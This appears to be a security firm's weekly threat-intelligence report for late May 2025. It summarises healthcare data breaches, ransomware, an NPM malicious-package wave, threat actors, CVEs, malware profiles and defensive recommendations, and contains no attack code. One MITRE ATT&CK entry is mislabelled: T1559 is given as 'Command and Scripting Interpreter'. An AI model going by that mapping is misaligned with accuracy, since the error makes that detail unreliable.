• Umer Wajih
• June 3, 2025
• No Comments

Threat Landscape Summary (May 26 – June 2, 2025)

I. EXECUTIVE SUMMARY

This report analyzes the cybersecurity threat landscape observed between May 26th and June 2nd, 2025. The week was characterized by significant activity across multiple threat vectors, featuring:

Key Highlights

• Major Healthcare Sector Breaches: Data breaches impacting healthcare providers through third-party vendors, affecting hundreds of thousands of individuals
• Continued Ransomware Evolution: Discovery of new ransomware strains and disruptive attacks on critical infrastructure
• State-Aligned Espionage: Russian-linked group targeting Tajikistan with novel attack chains
• Supply Chain Vulnerabilities: Critical vulnerabilities in widely-used software and development ecosystems

Critical Incidents

• Ascension Healthcare: 437,329 individuals affected via third-party vendor vulnerability
• Catholic Health: 483,000+ individuals impacted through vendor database misconfiguration
• Kettering Health: Major ransomware attack causing system-wide outages
• Adidas: Customer data breach via third-party service provider

Priority Actions Required

Organizations must prioritize:

1. Strengthening third-party risk management
2. Accelerating vulnerability patching
3. Enhancing defenses against phishing and supply chain attacks
4. Improving ransomware resilience
5. Addressing insider threats

II. GLOBAL CYBER THREAT LANDSCAPE OVERVIEW

Ransomware Evolution

Ransomware remained a significant disruptive force, demonstrating resilience despite recent law enforcement actions:

Active Threats:

• Kettering Health Attack: Severe ransomware attack by Interlock (Nefarious Mantis) group causing system-wide outages
• New Ransomware Strains Identified:
  • Lyrix Ransomware: Python-based, uses PyInstaller packaging, advanced Windows evasion techniques
  • RedFox Ransomware: File encryption with “.redfox” extension, data leak threats
  • ChronoLock Ransomware: Hybrid AES-RSA encryption, targets network shares and backups

Key Observations:

• Ransomware-as-a-Service (RaaS) model continues to facilitate new actor entry
• Focus on critical sectors with sensitive data and continuous IT operations
• Enhanced evasion techniques and rapid encryption capabilities

Supply Chain and Cloud Security Risks

Third-Party Vendor Vulnerabilities: Multiple significant breaches originated from third-party service providers:

• Adidas (customer service provider compromise)
• Ascension (former partner software vulnerability)
• Harbin Clinic (debt collection agency NRS)
• Catholic Health (Serviceaide database misconfiguration)

Software Supply Chain Threats:

• NPM Registry Compromise: 60 malicious packages discovered containing data theft scripts
• Packages designed to steal system information from developer environments
• Exploitation of trust in package managers for malware distribution

Cloud Infrastructure Implications:

• Serviceaide’s misconfigured Elasticsearch database affecting Catholic Health
• Emphasis on secure cloud configuration and management
• Need for comprehensive Third-Party Risk Management (TPRM) programs

III. NOTABLE INCIDENTS AND DATA BREACHES

Major Healthcare Sector Breaches

Ascension Data Breach

• Impact: 437,329 individuals affected
• Cause: Software vulnerability in former third-party business partner
• Data Exposed: Names, addresses, SSNs, extensive medical and insurance information
• Location: Missouri-based healthcare provider

Catholic Health / Serviceaide Data Leak

• Impact: 483,000+ individuals potentially affected
• Cause: Publicly accessible Elasticsearch database managed by vendor Serviceaide
• Timeline: September-November 2024 exposure period
• Data Exposed: Names, SSNs, medical information, login credentials

Harbin Clinic / NRS Breach

• Impact: ~210,140 patients affected
• Cause: July 2024 cyberattack on Nationwide Recovery Services (NRS)
• Data Exposed: Names, addresses, SSNs, financial details, medical records
• Context: Third-party debt collector compromise

Other Significant Incidents

Kettering Health Ransomware Attack

• Location: Ohio, USA
• Threat Actor: Interlock (Nefarious Mantis) group
• Impact: System-wide outages, service disruption, elective procedure cancellations
• Status: Active incident response

Adidas Data Breach

• Scope: Global customer base
• Cause: Third-party customer service provider compromise
• Data Exposed: Customer names, email addresses, phone numbers

State-Aligned Activities

• TAG-110 Campaign: Russian-aligned group targeting Tajikistan with macro-enabled Word templates
• PureRAT Surge: Fourfold increase in attacks targeting Russian organizations via spam emails

Insider Threat Incident

• Agency: Defense Intelligence Agency (DIA)
• Details: IT specialist arrested for attempting to transmit national defense information to foreign government

IV. COMPREHENSIVE INCIDENT SUMMARY TABLE

Affected Entity	Location/Scope	Type of Incident	Date Reported	Brief Description/Impact
Kettering Health	Ohio, USA	Ransomware Attack (Interlock)	May 2025	System-wide outage, IT disruption, procedure cancellations
Adidas	Global	Data Breach (Third-Party)	May/June 2025	Customer contact details exposed
Ascension	Missouri, USA	Data Breach (Third-Party Vulnerability)	May/June 2025	437,329 individuals; PII, SSNs, medical data
Harbin Clinic	USA	Data Breach (Third-Party Compromise)	May/June 2025	~210,140 patients; via NRS debt collector attack
Catholic Health	New York, USA	Data Leak (Vendor Misconfiguration)	May/June 2025	483,000+ individuals; unsecured Serviceaide database
Fortinet Products	Global	Critical Vulnerabilities	May 23, 2025	Multiple CVEs allowing RCE and unauthorized access
Ubuntu/RHEL Systems	Global	Information Disclosure	May/June 2025	Race condition flaws in Apport/systemd-coredump
NPM Registry	Global	Malicious Packages	May/June 2025	60 packages with data theft capabilities
Tajikistan Entities	Tajikistan	Phishing Campaign (TAG-110)	May/June 2025	Russia-aligned macro-enabled Word templates
Russian Organizations	Russia	Malware Campaign (PureRAT)	May/June 2025	Fourfold increase in attacks via spam
Defense Intelligence Agency	USA	Insider Threat	May/June 2025	IT specialist arrested for espionage attempt

V. CURRENT THREAT LANDSCAPE ANALYSIS

Emerging Trends

• Increased Phishing Sophistication: AI-generated content creating more convincing lures
• RaaS Platform Resilience: Quick migration to new variants after takedowns
• Edge Device Exploitation: Targeting internet-facing devices and VPNs for initial access
• Supply Chain Focus: Continued probing of third-party vendors for access opportunities

Additional Notable Security Incidents

Incident Name	Date	Sector	Summary	Impact	Suspected Actor	Status
FinServ Credential Phishing Blitz	May 29, 2025	Financial Services	Large-scale phishing targeting banking credentials	Multiple account compromises	“SilentSharks” (Cybercrime)	Ongoing Investigation
MediCareLogins Data Exposure	May 27, 2025	Healthcare	Misconfigured cloud database exposure	75,000 patient records exposed	Accidental Exposure	Publicly Reported
Retail Giant POS Malware	June 1, 2025	Retail	Point-of-Sale malware discovery	Unknown payment card data theft	Unknown/Cybercrime	Internal Discovery

VI. CRITICAL VULNERABILITIES AND CVEs

High-Priority Vulnerabilities

CVE ID	Product Affected	Severity	Description	Potential Impact
CVE-2025-10350	SecureConnect Enterprise VPN Suite	Critical	Remote code execution vulnerability allowing unauthenticated access	Complete system compromise, network infiltration
CVE-2025-10351	CommonWebServer Framework 3.x	High	SQL injection in administrative interface	Unauthorized data access, server takeover
CVE-2025-10352	QuickChat Messenger Desktop	Medium	Cross-site scripting (XSS) vulnerability	Session hijacking, credential theft
CVE-2025-10353	CoreOS Kernel Module	High	Local privilege escalation vulnerability	Local attacker gains root privileges
CVE-2025-5054	Ubuntu (Apport)	Medium	Race condition allowing core dump access	Local information disclosure
CVE-2025-4598	RHEL/Fedora (systemd-coredump)	Medium	Race condition vulnerability	Local information disclosure

Fortinet Critical Vulnerabilities

• CERT-In Alert: CIVN-2025-0103
• Impact: Multiple products affected with potential for remote code execution
• Status: Patches available, immediate deployment recommended

VII. THREAT ACTOR ACTIVITIES

Active Threat Groups

SteelPhantom

• Affiliation: State-Aligned (Speculative)
• Targets: Government, Defense, Critical Infrastructure
• TTPs:
  • T1190 (Exploit Public-Facing Application)
  • T1559 (Command and Scripting Interpreter)
  • T1566 (Phishing)
  • T1078 (Valid Accounts)
• Activity: Exploiting CVE-2025-0789, increased spear-phishing
• Confidence: High

“EphemeralGaze” Campaign

• Motivation: Financially Motivated
• Targets: E-commerce, Online Payment Processors
• TTPs:
  • T1555 (Credentials from Password Stores)
  • T1110 (Brute Force)
  • T1056.001 (Keylogging)
• Activity: Advanced infostealers via malvertising
• Confidence: Medium

APT-C-99 (aka “SandWasp”)

• Affiliation: Unknown (Emerging Threat)
• Targets: Telecommunications (Asia-Pacific)
• TTPs:
  • T1204.002 (Malicious File)
  • T1547.001 (Registry Run Keys)
  • T1071.001 (Web Protocols for C2)
• Activity: Spear-phishing with LNK attachments, custom RAT deployment
• Confidence: Emerging

TAG-110

• Affiliation: Russia-aligned (APT28-linked)
• Targets: Tajikistan entities
• TTPs: Macro-enabled Word templates for initial access
• Activity: Ongoing phishing campaigns

VIII. MALWARE ANALYSIS

Featured Malware Families:

ChronoLock Ransomware

• Type: Ransomware (RaaS)
• Key Features:
  • Hybrid AES-RSA encryption algorithm
  • Targets network shares and backups
  • Uses living-off-the-land binaries (LOLBins)
• Delivery: Phishing emails, RDP exploitation
• Impact: Data encryption, operational disruption, double extortion

InfoStealer.X7

• Type: Information Stealer
• Key Features:
  • Browser credential harvesting
  • Cryptocurrency wallet targeting
  • Anti-VM and anti-debugging capabilities
• Delivery: Malvertising, bundled freeware
• Impact: Identity theft, financial fraud

SynapseBot

• Type: Modular Botnet
• Key Features:
  • DDoS capabilities
  • Spam distribution
  • Decentralized P2P C2 infrastructure
• Delivery: Compromised IoT devices, credential brute-forcing
• Impact: DDoS attacks, spam campaigns, malware propagation

Lyrix Ransomware

• Type: Ransomware (New Strain)
• Key Features:
  • Python-based development
  • PyInstaller packaging
  • Advanced Windows evasion techniques
• Discovery: CYFIRMA threat intelligence

RedFox Ransomware

• Type: Ransomware (New Strain)
• Key Features:
  • File encryption with “.redfox” extension
  • Data leak threats
  • Pressure tactics for quick payment
• Discovery: CYFIRMA threat intelligence

PureRAT (Malware-as-a-Service)

• Type: Remote Access Trojan
• Activity: Fourfold increase in attacks targeting Russian organizations
• Delivery: Spam email campaigns
• Impact: Unauthorized remote access, data theft

IX. RECOMMENDATIONS

For Technical Audiences

Immediate Actions (24-48 Hours)

1. Critical Patch Deployment:
   • CVE-2025-10350 (SecureConnect Enterprise VPN)
   • CVE-2025-10351 (CommonWebServer Framework)
   • Review and apply all listed CVE patches
2. IOC Implementation:
   • Deploy Indicators of Compromise in firewalls, IDS/IPS, EDR, and SIEM
   • Update threat intelligence feeds
3. Network Security:
   • Review network segmentation for ransomware blast radius limitation
   • Harden VPN and edge device configurations
   • Disable unnecessary services, enforce MFA

Strategic Improvements

1. Backup Verification:
   • Ensure offline, immutable backups
   • Regular restoration testing
   • Air-gapped backup strategies
2. Phishing Defense Enhancement:
   • Update email security gateways
   • Conduct AI-focused phishing simulations
   • User awareness training updates
3. MITRE ATT&CK Mapping:
   • Review defensive capabilities against highlighted TTPs
   • Focus on T1190, T1559, T1566, T1078

For Non-Technical Audiences

Security Awareness

1. Phishing Vigilance:
   • Extreme caution with unsolicited emails
   • Verify sender authenticity through separate channels
   • Immediate reporting of suspicious communications
2. Authentication Security:
   • Strong, unique passwords for all accounts
   • Multi-Factor Authentication (MFA) implementation
   • Regular password updates
3. System Maintenance:
   • Keep operating systems and applications updated
   • Enable automatic updates where possible
   • Secure browsing practices
4. Incident Response:
   • Prompt reporting of suspicious activities
   • Immediate escalation to IT/Security teams
   • Documentation of unusual computer behavior

X. ANALYST NOTES

Intelligence Assessment

• SteelPhantom Activity: Confirmed intelligence from multiple trusted sources regarding CVE-2025-0789 exploitation
• EphemeralGaze Campaign: Moderate confidence based on industry reports and OSINT
• APT-C-99 Capabilities: Requires further investigation for full impact assessment

Emerging Trends Analysis

• ChronoLock Evolution: Likely evolution of known ransomware family with enhanced evasion
• AI in Phishing: Accelerating trend requiring updated user education approaches
• Geopolitical Alignment: SteelPhantom targeting patterns suggest ongoing intelligence gathering operations

Confidence Levels

• High Confidence: Confirmed ransomware attacks, disclosed data breaches, published CVEs
• Medium Confidence: Emerging threat actor activities, new malware family analysis
• Developing: Supply chain attack vectors, AI-enhanced phishing campaigns

XI. CONTACT INFORMATION

For further inquiries or guidance regarding this report, please contact the Meraal Cyber Security (MCS) Threat Intelligence Team.

• Website: www.meraal.me
• Email: Office@meraal.me , Naveed@meraal.me
• Phone: +92 42 357 27575, +92 323 497 947

Note on Sources and Intelligence: This report synthesizes information from various credible sources, including public advisories from organizations like CISA, MITRE, and MS-ISAC, alongside internal analysis and emerging threat intelligence. Efforts have been made to differentiate between confirmed intelligence and speculative or unverified information to maintain accuracy and credibility.